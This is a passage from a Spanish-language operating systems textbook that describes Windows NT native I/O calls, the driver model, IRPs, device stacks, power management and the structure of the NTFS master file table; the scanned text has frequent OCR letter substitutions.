Bloquea un rango de bytes en un archivo 

NtUnlockFile 

Elimina un bloqueo de rango 

NtFsControlFile 

Varias operaciones en un archivo 

NtFIushBuffersFile 

Vacía los búferes de archivos en memoria al disco 

NtCancelloFile 

Cancela las operaciones de E/S pendientes en un archivo 

NtDeviceloControlFile 

Operaciones especiales en un dispositivo 


Figura 11-37. Llamadas a la API nativa de NT para realizar operaciones de E/S. 


Para mantener la filosofía general de Windows, las llamadas al sistema de E/S nativas de NT 
reciben muchos parámetros e incluyen muchas variaciones. La figura 11-37 lista las interfaces pri¬ 
marias de llamadas al sistema para el administrador de E/S. NtcreateFiie se utiliza para abrir ar¬ 
chivos nuevos o existentes. Proporciona descriptores de seguridad para archivos nuevos, una 
extensa descripción de los permisos de acceso solicitados y otorga al creador de nuevos archivos 
cierto control sobre la forma en que se asignarán los bloques. NtReadFiie y NtwriteFiie reciben un 
manejador de archivo, un búfer y una longitud. También reciben un desplazamiento de archivo ex¬ 
plícito y permiten especificar una clave para acceder a los rangos bloqueados de bytes en el archi¬ 
vo. La mayoría de los parámetros están relacionados con la especificación de los distintos métodos 
a utilizar para reportar la compleción de las operaciones de E/S (posiblemente asincronas), como se 
describe antes. 

NtQueryDirectoryFiie es un ejemplo de un paradigma estándar en el ejecutivo, en donde exis¬ 
ten variasAPIs de consulta para utilizar o modificar información sobre ti pos específicos de objetos. 
En este caso, los objetos de archivo son los que se refieren a los directorios. Un parámetro especi¬ 
fica el tipo de información solicitada, como una lista de los nombres en el directorio o información 
detallada sobre cada archivo que se requiere para un listado de directorios extendido. Como en rea¬ 
lidad ésta es una operación de E/S, se admiten todas las formas estándar de reportar que se comple¬ 
tó la operación de E/S. NtQueryvoiumeinformationFiie es como la operación de consulta de 
directorios, pero espera un manejador de archivo que representa un volumen abierto, el cual puede 
contener o no un sistema de archivos. A diferencia de los directorios, hay parámetros que se pueden 
modificar en los volúmenes, y por ende hay una API NtsetvoiumeinformationFiie separada. 
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NtNotifyChangeDirectoryFile es un ejemplo de un interesante paradigma de NT. Los hiios 
pueden reaiizar operaciones de E/S para determinar si ocurre aigún cambio en ios objetos (princi- 
paimente en ios directorios dei sistema de archivos, como en este caso, o en ias ciavesdei registro). 
Como ia E/S es asincrona, ei hiio regresa y continúa, y sóio se ie notifica más tarde cuando se mo¬ 
difica aigo. La petición pendiente se pone en coia en ei sistema de archivos como una operación de 
E/S pendiente, mediante ei uso de un Paquete de peticiones de E/S (IRP). Las notificaciones son pro- 
biemáticassi ei usuario deseaeiiminarei voiumen de un sistema de archivos dei sistema, debido a que 
hay operaciones de E/S pendientes. Por io tanto, Windows proporciona herramientas para canceiar ias 
operaciones de E/S pendientes, inciuyendo ei soporte en ei sistema de archivos para desmontar por 
ia fuerza un voiumen con E/S pendiente. 

NtQueryinformationFiie es ia versión específica para archivos de ia iiamada ai sistema para 
directorios. Tiene una iiamada ai sistema compiementaria, NtsetinformationFiie. Estas interfaces 
utiiizan y modifican todo tipo de información sobre ios nombres de ios archivos, ias características 
de ios mismos como ei cifrado, ia compresión y ia dispersión, y otros atributos y detaiies sobre ios 
archivos, inciuyendo ia búsqueda dei id de archivo interno o ia asignación de un nombre binario 
único (id de objeto) a un archivo. 

En esencia, estas iiamadas ai sistema son una forma de iocti específica para ios archivos. La 
operación set se puede utiiizar para cambiar ei nombre a un archivo o eiiminario. Pero hay que te¬ 
ner en cuenta que reciben manejadores y no nombres de archivos, por io que primero hay que abrir 
un archivo para poder cambiarie ei nombre o eiiminario. También se pueden utiiizar para cambiar 
ei nombre a iosfiujos de datos aiternativos en NTFS (vea ia sección 11.8). 

Hay APIS separadas, NtiockFiie y NtuniockFiie para establecer y eliminar los bloqueos de 
rangos de bytes en archivos. NtcreateFtie permite restringir el acceso a un archivo completo me¬ 
diante el uso de un modo de compartición. Una alternativa son estasAPIs de bloqueo, que aplican 
restricciones de acceso obligatorias a un rango de bytes en el archivo. Las lecturas y escrituras de¬ 
ben proporcionar una clave que coincida con la clave que se proporciona a NttockFiie para poder 
operar en los rangos bloqueados. 

Existen herramientas similares en UNIX, pero ahí es discrecional si las aplicaciones conside¬ 
ran o no los bloqueos de rangos. NtFsControiFiie es muy parecido a las operaciones Query y Set 
anteriores, pero es una operación más genérica, orientada al manejo de operaciones específicas de 
archivos que no se ajustan dentro de las otrasAPIs. Por ejemplo, algunas operaciones son específi¬ 
cas para un sistema de archivos particular. 

Por último, hay llamadas variadas como NtFiushBuffersFiie. Al igual que la llamada sync de 
U NIX, obliga a escribir los datos del sistema de archivos de vuelta al disco. NtcanceiioFiie se uti¬ 
liza para cancelar las peticiones de E/S pendientes para un archivo específico, y NtoeviceioCon- 
troiFiie implementa operaciones iocti para los dispositivos. En realidad, la lista de operaciones 
es mucho mayor. Hay llamadas al sistema para eliminar archivos por nombre, y consultar los atribu¬ 
tos de un archivo específico: pero éstas son sólo envolturas alrededor de las otras operaciones del ad¬ 
ministrador de E/S que hemos listado, y en realidad no se necesitaban implementar como llamadas 
al si tema separadas. También hay llamadas al sistema para lidiar con los puertos de compleción de 
E/S, una instalación de colas en Windows que ayuda a los servidores multihilo a utilizar con eficien¬ 
cia las operaciones de E/S asincronas, al hacer que los hilos estén listos bajo demanda y reducir el 
número de cambios de contexto requeridos para atender las operaciones de E/S en hilos dedicados. 
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11.7.3 Implementación déla E/S 

El sistema de E/S deWindowsconsisteen los servicios de plug-and-play, el administrador de ener¬ 
gía, el administrador de E/S y el modelo del driver de dispositivos. Plug-and-play detecta los cam¬ 
bios en la configuración del hardware y crea o derriba las pilas de dispositivos para cada 
dispositivo, además de producir la carga y descarga de los drivers de dispositivos. El administra¬ 
dor de energía ajusta el estado de energía de los dispositivos de E/S para reducir el consumo de 
energía del sistema cuando los dispositivos no se utilizan. El administrador de E/S proporciona so¬ 
porte para manipular objetos del kernel de E/S, y operaciones basadas en IRP como locaiiorivers 
y loCompieteRequest. Pero la mayor parte del trabajo requerido para proveerla E/S de Windows se 
implemento mediante los mismos drivers de dispositivos. 

Drivers de dispositivos 

Para asegurar que los drivers de dispositivos funcionen bien con el resto de Windows Vista, M icro- 
soft ha definido el modelo WDM (Windows Driver M odel, M odelo de drivers de Windows) que 
los drivers de dispositivos deben seguir. El WDM se diseñó para trabajar con Windows 98 y Win¬ 
dows basado en NT a partir de Windows 2000, para permitir que los drivers escritos de manera cui¬ 
dadosa fueran compatibles con ambos sistemas. Hay un kit de desarrollo (el Kit de Drivers de 
Windows) que está diseñado para ayudar a los escritores de drivers a producir drivers que estén en 
conformidad con este modelo. La mayoría de los drivers de Windows empiezan por copiar un dri¬ 
ver de muestra apropiado y lo modifican. 

M icrosoft también provee un verificador de drivers, que valida muchas de las acciones délos 
drivers para asegurar que estén en conformidad con los requerimientos del WDM para la estructu¬ 
ra y los protocolos para las peticiones de E/S, la administración de la memoria, etcétera. El verifi¬ 
cador se incluye con el sistema, y los administradores pueden controlarlo al ejecutarverifier.exe, lo 
cual les permite configurar los drivers que se van a comprobar y qué tan extensivas (es decir, cos¬ 
tosas) deben ser las comprobaciones. 

Aun con todo el soporte para el desarrollo y la verificación de drivers, sigue siendo muy difícil 
escribir incluso drivers simples en Windows, por lo cual M icrosoft ha creado un sistema de envoltu¬ 
ras conocidas como WDF (Windows Driver Foundation, Fundamento de Drivers de Windows) 
que se ejecuta encima del WDM y simplifica muchos de los requerimientos más comunes, en su 
mayor parte relacionados con la interacción correcta con la administración de energía y las opera¬ 
ciones de plug-and-play. 

Para simplificar aún más la escritura de drivers, así como incrementar la solidez del sistema, 
WDF incluye el UMDF (User-Mode Driver Framework, Marco de trabajo de drivers en modo 
de usuario) para escribir drivers como servicios que se ejecutan en procesos. También está el 
KMDF (Kernel-Mode Driver Framework, Marco de trabajo de drivers en modo de kernel) para 
escribir drivers como servicios que se ejecutan en el kernel, pero en donde muchos de los detalles 
del WDM se hacen automáticamente. Como debajo de estos marcos de trabajo está el WDM que 
proporciona el modelo de drivers, es en lo que nos enfocaremos en esta sección. 

Los dispositivos en Windows se representan mediante objetos de dispositivo. Estos objetos se 
utilizan para representar hardware como los buses, y también abstracciones de software como los 
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sistemas de archivos, ios motores de protocoios de red y ias extensiones dei kernei, como ios dri- 
vers de fiitros antivirus. Todos estos objetos se organizan mediante ia producción de io que Win¬ 
dows denomina piia de dispositivos, como se mostró antes en ia figura 11-16. 

Para iniciar ias operaciones de E/S, ei administrador de E/S iiama a unaAPI locaiioriver dei 
ejecutivo, con apuntadores ai objeto de dispositivo superior y ai IRP que representa ia petición de 
E/S. Esta rutina busca ei objeto de driver asociado con ei objeto de dispositivo. Por io generai, ios 
tipos de operaciones que se especifican en ei IRP corresponden a las llamadas al sistema del admi¬ 
nistrador de E/S antes descritas, como CREATE, READ y CLOSE. 

En la figura 11-38 se muestran las relaciones para un solo nivel de la pila de dispositivos. Pa¬ 
ra cada una de estas operaciones, un driver debe de especificar un punto de entrada. locaiioniver 
obtiene el tipo de operación del IRP, utiliza el objeto de dispositivo en el nivel actual de la pila de 
dispositivos para buscar el objeto de driver y se indexa en la tabla de despacho de drivers con el ti¬ 
po de operación para encontrar el punto de entrada correspondiente en el driver. Después se llama 
al driver y éste recibe el objeto de dispositivo y el IRP. 


Objeto de dispositivo Driver de dispositivo cargado 



Figura 11-38. U n nivel individual en una pila de dispositivos. 

Una vez que un driver termina de procesar la petición representada por el IRP, tiene tres opcio¬ 
nes. Puede llamar a loCaiioriver otra vez para pasarle el IRP y el siguiente objeto dispositivo en 
la pila de dispositivos. Puede declarar la petición de E/S como completa y regresar al proceso que 
lo llamó. O puede poner en cola el IRP de manera interna y regresar al proceso que lo llamó, ha¬ 
biendo declarado que la petición de E/S sigue pendiente. Este último caso produce una operación 
de E/S asincrona, por lo menos si todos los drivers por encima en la pila están de acuerdo y regre¬ 
san a los procesos que los llamaron. 


Paquetes de peticiones de E/S 

La figura 11-39 muestra los principales campos en el IRP. La parte inferior del IRP es un arreglo de 
tamaño dinámico, el cual contiene los campos que puede utilizar cada driver para la pila de dispo¬ 
sitivos que maneja la petición. Estos campos de pila también permiten a un driver especificar la ru- 
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tina a llamar al completar una petición de E/S. Durante la compleción, cada nivel de la pila de dis¬ 
positivos se visita en orden inverso, y se hace una llamada a la rutina de compleción asignada a ca¬ 
da driver en turno. En cada nivel, el driver puede seguir completando la petición, o puede decidir 
que aún hay más trabajo por hacer y dejar pendiente la petición, para lo cual suspende la comple¬ 
ción de E/S en ese momento. 



Siguiente 

IRP 


Figura 11-39. Los principales campos de un Paquete de Peticiones de E/S. 

Al asignar un IRP, el administrador de E/S tiene que saber qué tan profunda es la pila de dis¬ 
positivos específica, para poder asignarle un IRP lo bastante grande. Llevad registro de la profun¬ 
didad de la pila en un campo en cada objeto de dispositivo, a medida que se forma la pila de 
dispositivos. Observe que no hay una definición formal sobre cuál es el siguiente objeto de dispo¬ 
sitivo en cualquier pila. Esa información se mantiene en estructuras de datos privadas que pertene¬ 
cen al driver anterior en la pila. De hecho, la pila en realidad ni siquiera tiene que ser una pila. En 
cualquier nivel, un driver es libre de asignar nuevos IRPs, de seguir utilizando el IRP original, de 
enviar una operación de E/S a una pila de dispositivos distinta, o de incluso cambiar a un hilo tra¬ 
bajador del sistema para continuar su ejecución. 

El IRP contiene banderas, un código de operación para indexarlo en la tabla de despacho de 
drivers, apuntadores al búfer tal vez para ambos búferes (de kernel y de usuario), y una lista 
de M DLs (Memory Descriptors Lists, Listas de descriptores de memoria) que se utilizan para des¬ 
cribir las páginas físicas representadas por los búferes: es decir, para las operaciones de DM A. Hay 
campos que se utilizan para las operaciones de cancelación y de compleción. Los campos en el IRP 
que se utilizan para poner en cola el IRP para los dispositivos mientras se está procesando, se vuel¬ 
ven a utilizar cuando por fin se completa la operación de E/S, para proporcionar memoria al obje¬ 
to de control de la A PC que se utiliza para llamar a la rutina de compleción del administrador de 
E/S, en el contexto del hilo original. También hay un campo de vínculo que se utiliza para vincular 
todos los IRPs pendientes con el hilo que los inició. 
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Pilas de dispositivos 

Un driver en Windows Vista puede hacer todo ei trabajo por sí soio, como ei driver de impresora 
en ia figura 11-40. Por otra parte, ios drivers también se pueden apiiar, io cuai significa que una pe¬ 
tición puede pasar a través de una secuencia de drivers, cada uno de ios cuaies hace una parte dei 
trabajo. En ia figura 11-40 también se iiustran dos drivers apiiados. 


Proceso de usuario 



Pila de 
rdrivers 



Figura 11-40. Windows permite apilar los drivers para trabajar con una instancia espe¬ 
cífica de un dispositivo. El apilamiento se representa mediante objetos de dispositivo. 

Un uso común para ios drivers apiiados es para separar ia administración dei bus dei trabajo 
funcionai de controiar ei dispositivo. La administración en ei bus PCI es bastante complicada debi¬ 
do a los diversos tipos de modos y transacciones del bus. Al separar este trabajo de la parte especí¬ 
fica del dispositivo, los escritores de drivers ya no tienen que aprender a controlar el bus. Sólo 
tienen que usar el driver de bus estándar en su pila. De manera similar, los drivers USB y SCSI tie¬ 
nen una parte específica del dispositivo y una parte genérica, en donde Windows suministra los dri¬ 
vers comunes para la parte genérica. 

Otro uso de los drivers apilados es para poder insertar drivers de filtro en la pila. Ya hemos 
visto el uso de los drivers de filtro del sistema de archivos, que se insertan por encima de este sis- 
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tema. Los drivers de filtro también se utilizan para administrar el hardware físico. Un driver de fil¬ 
tro realiza cierta transformación en las operaciones a medida que el IRP fluye hacia abajo por la pi¬ 
la de dispositivos, y también durante la operación de compleción con el IRP fluye hacia abajo por 
las rutinas de compleción especificadas por cada driver. Por ejemplo, un driver de filtro podría com¬ 
primir los datos en su camino hacia el disco, o cifrarlos en su camino a la red. La acción de colo¬ 
car el filtro aquí significa que ni el programa de aplicación ni el verdadero driver de dispositivo 
tienen que estar conscientes de ello, y funciona de manera automática para todos los datos que van 
al (o provienen del) dispositivo. 

Los drivers de dispositivos en modo de kernel son un problema grave para la confiabilidad y 
estabilidad de Windows. La mayoría de las fallas del kernel en Windows se deben a errores en los 
drivers de dispositivos. Como los drivers de dispositivos en modo de kernel comparten el mismo 
espacio de direcciones con los niveles del kernel y del ejecutivo, los errores en los drivers pueden 
corromper las estructuras de datos del sistema, o peor aún. Algunos de estos errores se deben al 
asombroso gran número de drivers de dispositivos que existen para Windows, o a los drivers que 
desarrollan programadores de sistemas menos experimentados. Los errores también se deben a la 
gran cantidad de detalle implicado en la escritura de un driver correcto para Windows. 

El modelo de E/S es poderoso y flexible, pero en esencia todas las operaciones de E/S son asin¬ 
cronas, por lo que pueden abundar las condiciones de competencia. Windows 2000 agregó las herra¬ 
mientas de plug-and-play y de administración de energía de los sistemas Win9x a los sistemas 
Windows basados en NT por primera vez. Esto impuso un gran número de requerimientos sobre los 
drivers para lidiar de manera correcta con los dispositivos que se conectan y desconectan mientras 
los paquetes de E/S están a la mitad de su proceso. Los usuarios de PCs acoplan/desacoplan disposi¬ 
tivos con frecuencia, cierran la tapa y meten las portátiles en maletines, y en general no se preocupan 
sobre el hecho de que la luz verde de actividad esté todavía encendida. Puede ser muy desafiante es¬ 
cribir drivers de dispositivos que funcionen de manera correcta en este entorno, razón por la cual se 
desarrolló la Fundación de drivers de Windows para simplificar el M odelo de drivers de Windows. 

El administrador de energía se encarga de manejar el uso de la energía en todo el sistema. 
A nteriormente, la administración del consumo de energía consistía en desactivar el monitor y dete¬ 
ner el giro de las unidades de disco. Pero esta cuestión se está complicando cada vez más debido a 
los requerimientos para extender el tiempo que pueden operar las portátiles con baterías, y las cues¬ 
tiones de conservación de energía relacionadas con el hecho de que las computadoras de escritorio 
se dejen encendidas todo el tiempo, y el alto costo de suministrar energía a las enormes granjas de 
servidores que existen en la actualidad (empresas como M icrosofty Google están construyendo sus 
granjas de servidores enseguida de las instalaciones hidroeléctricas para obtener tarifas bajas). 

Las herramientas de administración de energía más recientes incluyen la reducción del consu¬ 
mo de energía de los componentes cuando el sistema no está en uso, al pasar los dispositivos indi¬ 
viduales a estados en espera, o incluso apagarlos por completo mediante el uso de interruptores de 
energía suaves. Los multiprocesadores desactivan las CPUs individuales cuando no se necesitan, e 
incluso las velocidades de reloj de las CPUs en ejecución se pueden ajustar a un valor menor para 
reducir el consumo de energía. Cuando un procesador está inactivo, también se reduce su consumo 
de energía, ya que necesita no estar haciendo nada más que esperar a que ocurra una interrupción. 

Windows proporciona un modo especial de apagado, conocido como hibernación, en donde 
se copia toda la memoria física al disco y después se reduce el consumo de energía a un pequeño 
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goteo (las portátiles pueden estar por semanas en un estado de hibernación) con poco consumo de 
la batería. Como todo el estado de la memoria se escribe en el disco, podemos incluso reemplazar la 
batería en una portátil mientras está en hibernación. Cuando el sistema se reinicia después de la hi¬ 
bernación, restaura el estado de memoria guardado (y reinicializa los dispositivos). Esto regresa a 
la computadora de vuelta al mismo estado en el que se encontraba antes de la hibernación, sin te¬ 
ner que volver a iniciar sesión otra vez e iniciar todas las aplicaciones y servicios que se estaban 
ejecutando. Aun cuando Windows trata de optimizar este proceso (incluyendo el ignorar las pági¬ 
nas no modificadas que ya están respaldadas en el disco y comprimir las otras páginas de memoria 
para reducir la cantidad de E/S requerida), de todas formas se pueden requerir muchos segundos pa¬ 
ra hibernar una portátil o un sistema de escritorio con varios gigabytes de memoria. 

El modo conocido como modo suspendido es una alternativa para la hibernación, en donde el 
administrador de energía reduce la energía de todo el sistema al menor estado de energía posible, 
utilizando sólo el poder suficiente para actualizar la RAM dinámica. Como la memoria no se nece¬ 
sita copiar al disco, esto es mucho más rápido que la hibernación. Pero el modo suspendido no es 
tan confiable, debido a que se puede perder el trabajo si un sistema de escritorio pierde la energía, 
o si se intercambia la batería en una portátil, o debido a los errores en varios drivers de dispositi¬ 
vos, que reducen la energía de los dispositivos a un estado de baja energía, pero después no pueden 
volver a inicializarlos. AI desarrollar Windows Vista, M icrosoft invirtió mucho esfuerzo en mejo¬ 
rar la operación del modo suspendido, con la cooperación de muchas personas en la comunidad de 
dispositivos de hardware. M icrosoft además detuvo la práctica de permitir que las aplicaciones ve¬ 
taran al sistema por pasar al modo suspendido (lo que algunas veces ocasionaba que las portátiles 
se calentaran de más, debido a que los usuarios descuidados las metían en los maletines sin esperar 
a que la luz parpadeara). Hay muchos libros disponibles sobre el M odelo de Drivers de Windows y 
la más reciente Fundación de Drivers de Windows (Cant, 2005; Oney, 2002; Orwick & Smith, 
2007; Viscarola y colaboradores, 2007). 


11.8 EL SISTEMA DE ARCHIVOS NT DE WINDOWS 

Windows Vista admite varios sistemas de archivos, de los cuales los más importantes son FAT-16, 
FAT-32 y NTFS (NT File System, Sistema de archivos de NT). FAT-16 es el antiguo sistema de ar¬ 
chivos de M S-DOS. Utiliza direcciones de disco de 16 bits, por lo cual se limita a particiones de 
disco de hasta 2 GB. En su mayor parte se utiliza para acceder a los discos flexibles, para los clien¬ 
tes que todavía los usan. FAT-32 utiliza direcciones de disco de 32 bits y admite particiones de dis¬ 
co de hasta 2 TB. No hay seguridad en el sistema FAT-32, por lo que en la actualidad sólo se utiliza 
para medios transportables, como las unidades flash. NTFS es el sistema de archivos que se desa¬ 
rrolló específicamente para la versión NT de Windows. Desde Windows XP se convirtió en el sis¬ 
tema de archivos predeterminado instalado por la mayoría de los fabricantes de computadoras, con 
lo cual se mejoró de manera considerable la seguridad y funcionalidad de Windows. El NTFS uti¬ 
liza direcciones de disco de 64 bits y (por lo tanto) acepta particiones de disco de hasta 2 ^^ bytes, 
aunque otras consideraciones lo limitan a tamaños más pequeños. 

En este capítulo examinaremos el sistema de archivos NTFS, debido a que es un sistema de ar¬ 
chivos moderno con muchas características interesantes e innovaciones de diseño. Debido a que es 
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un sistema de archivos grande y compiejo, iasiimitaciones de espacio nos impiden cubrir todas sus 
características, pero ei materiai que presentaremos a continuación deben mostrar una impresión ra- 
zonabie sobre este sistema. 

11.8.1 Conceptos fundamentales 

En NTFS, ios nombres de archivos individuaies están iimitados a 255 caracteres y ias rutas compie- 
tas a 32,767 caracteres. Los nombres de archivos están en Unicode, con io cuai ias personas en paí¬ 
ses que no utiiizan ei aifabeto en iatín (por ejempio, Grecia, japón. La India, Rusia e Israei) pueden 
escribir ios nombres de archivos en su ienguaje nativo. Por ejempio, (|)i?i8 es un nombre de archivo 
perfectamente iegai. NTFS admite por compieto ios nombres sensibies a mayúscuias y minúscuias 
(por io quefoo es distinto de Foo y de F 00). La API Win32 no admite por compieto ia sensibiiidad 
a mayúscuias y minúscuias para io nombres de archivos, y no ofrece ningún tipo de soporte para ios 
nombres de directorios. Ei soporte para ia sensibiiidad a mayúscuias y minúscuias existe cuando se 
ejecuta ei subsistema POSIX para poder mantener ia compatibiiidad con UNIX. Win32 no es sensi¬ 
ble a mayúsculas y minúsculas pero preserva su uso, por lo que los nombres de archivos pueden con¬ 
tener letras mayúsculas y minúsculas. Aunque la sensibilidad a mayúsculas y minúsculas es una 
característica muy conocida para los usuarios de U NIX, es muy inconveniente para los usuarios or¬ 
dinarios que por lo general no hacen ese tipo de distinción. Por ejemplo. Internet es en su mayor par¬ 
te insensible al uso de mayúsculas y minúsculas en la actualidad. 

Un archivo de NTFS no es sólo una secuencia lineal de bytes, como los archivos de FAT-32 y 
UNIX. En vez de ello, un archivo consiste en varios atributos, cada uno de los cuales se representa 
mediante un flujo de bytes. La mayoría de los archivos tienen unos cuantos flujos cortos, como el 
nombre del archivo y su ID de objeto de 64 bits, además de un flujo largo (sin nombre) con los datos. 
Sin embargo, un archivo también puede tener dos o más flujos de datos (largos). Cada flujo tiene un 
nombre que consiste en el nombre del archivo, un signo dedos puntos y el nombre del flujo, como en 
fooTlujol. Cada flujo tiene su propio tamaño y se puede bloquear en forma independiente a los demás 
flujos. La idea de varios flujos en un archivo no es nueva en NTFS. El sistema de archivos de la Ap¬ 
ple M acintosh utiliza dos flujos por archivo, la bifurcación de datos y de recursos. El primer uso de 
varios flujos para NTFS era permitir que un servidor de archivos de NT atendiera clientes M acintosh. 
También se utilizan varios flujos de datos para representar metadatos sobre los archivos, como las imá¬ 
genes en miniatura délas imágenes] PEG que están disponibles en la GUI de Windows. Pero por des¬ 
gracia, los flujos de datos múltiples son frágiles y con frecuencia se separan de los archivos cuando se 
transportan hacia otros sistemas de archivos, a través de la red o incluso cuando se respaldan y se res¬ 
tauran posteriormente, debido a que muchas herramientas los ignoran. 

NTFS es un sistema de archivos jerárquico, similar al sistema de archivos de UNIX. Sin em¬ 
bargo, el separador entre los nombres de los componentes es en vez de 7", un fósil heredado de 
los requerimientos de compatibilidad con CP/M cuando se creó M S-DOS. A diferencia de UNIX, 
el concepto del directorio actual de trabajo, los vínculos duros al directorio actual (.)y el directorio 
padre (..) se implementan como convenciones en vez de ser una parte fundamental del diseño del 
sistema de archivos. Hay soporte para los vínculos duros, pero sólo se utilizan para el subsistema 
POSIX, al igual que el soporte de NTFS para la comprobación del recorrido en los directorios (el 
permiso 'x' en UNIX). 
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Los vínculos simbólicos no tuvieron soporte en NTFS sino hasta Windows Vista. Por lo gene¬ 
ral, la creación de vínculos simbólicos está restringida sólo a los administradores, para evitar ries¬ 
gos de seguridad como la suplantación de identidad, como lo experimentó UNIX cuando se 
introdujeron por primera vez los vínculos simbólicos en 4.2BSD. La implementación de los víncu¬ 
los simbólicos en Vista utiliza una característica de NTFS conocida como puntos de reanálisis (que 
analizaremos más adelante en esta sección). También hay soporte para la compresión, el cifrado, la 
tolerancia a fallas, el registro de transacciones, y los archivos dispersos. En breve analizaremos es¬ 
tas características y sus implementadones. 

11.8.2 I mplementación del sistema de archivos NT 

NTFS es un sistema de archivos muy complejo y sofisticado, que se desarrolló de manera específi¬ 
ca para NT como una alternativa para el sistema de archivos FIPFS que se había desarrollado para 
OS/2. Aunque la mayor parte de NT se diseñó en tierra firme, NTFS es único entre los componen¬ 
tes del sistema operativo, en cuanto a que gran parte de su diseño original se realizó a bordo de un 
velero en Puget Sound (siguiendo un estricto protocolo de trabajo en la mañana y cerveza en la tar¬ 
de). A continuación examinaremos varias características de NTFS; empezaremos con su estructura 
y después veremos la búsqueda de nombres de archivos, la compresión de archivos, el registro de 
transacciones y el cifrado de archivos. 

E structura del sistema de archivos 

Cada volumen (partición de disco) de NTFS contiene archivos, directorios, mapas de bits y otras es¬ 
tructuras de datos. Cada volumen se organiza como una secuencia lineal de bloques (clústeres en la 
terminología de M icrosoft), en donde el tamaño del bloque está fijo para cada volumen y varía entre 
512 bytes y 64 KB, dependiendo del tamaño del volumen. La mayoría de los discos NTFS utilizan 
bloques de 4 K B como un compromiso entre los bloques grandes (para las transferencias eficientes) 
y los bloques pequeños (para un nivel bajo de fragmentación interna). Para hacer referencia a los blo¬ 
ques se utiliza su desplazamiento desde el inicio del volumen, mediante el uso de números de 64 bits. 

La principal estructura de datos en cada volumen es la MFT (Máster File Table, Tabla de 
archivos maestra), la cual es una secuencia lineal de registros de un tamaño fijo de 1 KB. Cada re¬ 
gistro de la M FT describe a un archivo o directorio. Contiene los atributos del archivo, como su 
nombre y las etiquetas de hora, además de la lista de direcciones de disco en donde se encuentran 
sus bloques. Si un archivo es muy grande, algunas veces es necesario utilizar dos o más registros 
de la M FT para contener la lista de todos los bloques, en cuyo caso el primer registro de la M FT 
(conocido como registro base) apunta a los otros registros de la M FT. Este esquema de desborda¬ 
miento se remonta a la época de CP/M , en donde a cada entrada en el directorio se le conocía co¬ 
mo una extensión. Un mapa de bits lleva el registro de las entradas libres en la M FT. 

La misma M FT es un archivo, y como tal se puede colocar en cualquier parte dentro el volu¬ 
men, con lo cual se elimina el problema con los sectores defectuosos en la primera pista. Además 
el archivo puede crecer según sea necesario, hasta un tamaño máximo de 2^® registros. 

La M FT se muestra en la figura 11-41. Cada registro de la M FT consiste en una secuencia de 
pares (encabezado de atributo, valor). Cada atributo empieza con un encabezado que le indica qué 
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atributo es, y qué tan largo es el valor. Algunos valores de atributos son de longitud variable, como 
el nombre del archivo y los datos. Si el valor del atributo es lo bastante corto como para caber en el 
registro de la M FT, se coloca ahí. A éste se le conoce como archivo inmediato (M ullender y Ta- 
nenbaum, 1984). Si es demasiado largo, se coloca en cualquier otra parte en el disco y se coloca un 
apuntador a él en el registro de la M FT. Esto hacea NTFS muy eficiente para pequeños campos: es 
decir, los que pueden caber dentro del mismo registro de la M FT. 

Los primeros 16 registros de la M FT se reservan para los archivos de metadatos de NTFS, co¬ 
mo se ilustra en la figura 11-41. Cada uno de los registros describe un archivo normal que tiene atri¬ 
butos y bloques de datos, de igual forma que cualquier otro archivo. Cada uno de estos archivos tiene 
un nombre que empieza con un signo de dólar, para indicar que es un archivo de metadatos. El pri¬ 
mer registro describe el archivo de la M FT. En especial, indica en dónde se encuentran los bloques 
del archivo de la M FT, de manera que el sistema pueda encontrarlo. Sin duda, Windows necesita una 
forma de buscar el primer bloque del archivo de la M FT para poder encontrar el resto de la informa¬ 
ción del sistema de archivos. La forma de encontrar el primer bloque del archivo de la M FT es bus¬ 
car en el bloque de inicio, en donde se instala su dirección cuando se da formato al volumen con el 
sistema de archivos. 
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Primer archivo de usuario 

i^íReseryadq para.uso.futuro), 

-^CRésérvadopárá usofúturo) 

i^íReseryado, para.uso .futuro), 

¡^{Reservado para uso futuro) V///////////////^^^^ 

$Extensiones: cuotas, etc. 

$Tabia de conversión de mayúscuias/minúscuias 

$Descriptores de seguridad para todos los archivos 

$BadCius Lista de bioques defectuosos 

$Boot Cargador de bootstrap 

$Bitmap Mapa de bits de bloques usados 

$ Directorio raíz 

$AttrDef Definiciones de los atributos 

$Volume Archivo de volumen 

$LogFile Archivo de registro para recuperación 

$MftMirr Copia espejo de la MFT 

$Mft Tabla de Archivos Maestra 




Archivos de 
metadatos 


Figura 11-41. La tabla de archivos maestra de NTFS. 

El registro 1 es un duplicado de la primera parte del archivo de la M FT. Esta información es tan 
valiosa que puede ser imprescindible tener una segunda copia en caso de que uno de los primeros 
bloques de la M FT se vuelva defectuoso. El registro 2 es el archivo de registro. Cuando se realizan 
cambios estructurales en el sistema de archivos, como agregar un nuevo directorio o eliminar uno 
existente, la acción se registra en este archivo antes de que se realice, para poder incrementar la pro¬ 
babilidad de recuperarse en forma correcta en caso de una falla durante la operación, como una falla 
en el sistema. Los cambios a los atributos de los archivos también se registran aquí. De hecho, los 
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Únicos cambios que no se registran en este archivo son ios que se reaiizan en ios datos de usuario. Ei 
registro 3 contiene información sobre ei voiumen, como su tamaño, etiqueta y versión. 

Como dijimos antes, cada registro de ia M FT contiene una secuencia de pares (encabezado de 
atributo, vaior). Ei archivo $AttrDef es en donde se definen ios atributos. La información sobre es¬ 
te archivo está en ei registro 4 de ia M FT. A continuación viene ei directorio raíz, que en sí es un 
archivo y puede crecer hasta una iongitud arbitraria. Se describe en ei registro 5 de ia M FT. 

En un mapa de bits se iieva ei registro dei espacio iibreen ei voiumen. Este mapa de bits es en 
sí un archivo, y sus atributos y direcciones de disco se proporcionan en ei registro 6 de ia M FT. Ei 
siguiente registro de ia M FT apunta ai archivo dei cargador de bootstrap. Ei registro 8 se utiiiza pa¬ 
ra vincuiar todos ios bioques defectuosos, para asegurar que nunca ocurran en un archivo. Ei regis¬ 
tro 9 contiene ia información de seguridad. Ei registro 10 se utiiiza para ia asignación demayúscuias 
y minúscuias. Para ias ietras de ia A a iaZ en iatín, ia asignación demayúscuias es obvia (porio me¬ 
nos para ias personas que habian iatín). La asignación de mayúscuias y minúscuias para otros ien- 
guajes como ei griego, armenio o georgiano (ei país, no ei estado de Estados Unidos) es menos obvia 
para ios que habian iatín, por io que este archivo indica cómo hacerio. Por úitimo, ei registro 11 es 
un directorio que contiene varios archivos para cosas como cuotas de disco, identificadores de obje¬ 
tos, puntos de reanáiisis, etcétera. Los úitimos cuatro registros de ia M FT están reservados para un 
uso futuro. 

Cada registro de ia M FT consiste en un encabezado de registro seguido por ios pares (encabe¬ 
